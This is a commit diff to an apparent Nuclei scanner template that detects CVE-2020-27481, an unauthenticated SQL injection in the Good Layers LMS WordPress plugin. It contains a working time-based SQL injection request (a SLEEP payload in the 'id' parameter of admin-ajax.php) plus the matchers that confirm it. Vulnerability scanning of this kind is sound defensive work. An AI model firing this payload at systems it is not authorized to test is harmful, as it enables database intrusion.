updated matchers

cves/2020/CVE-2020-27481.yaml

@@ -7,6 +7,7 @@ info:
   description: |
     An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization.
   reference:
+    - https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397
     - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070
     - https://nvd.nist.gov/vuln/detail/CVE-2020-27481
   classification:
@@ -16,18 +17,17 @@ info:
 requests:
   - raw:
       - |
+        @timeout: 15s
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))MrMV)
+        action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)
 
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=5'
-
-      - type: status
-        status:
-          - 200
+          - "duration>=6"
+          - "status_code == 200"
+          - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"
+        condition: and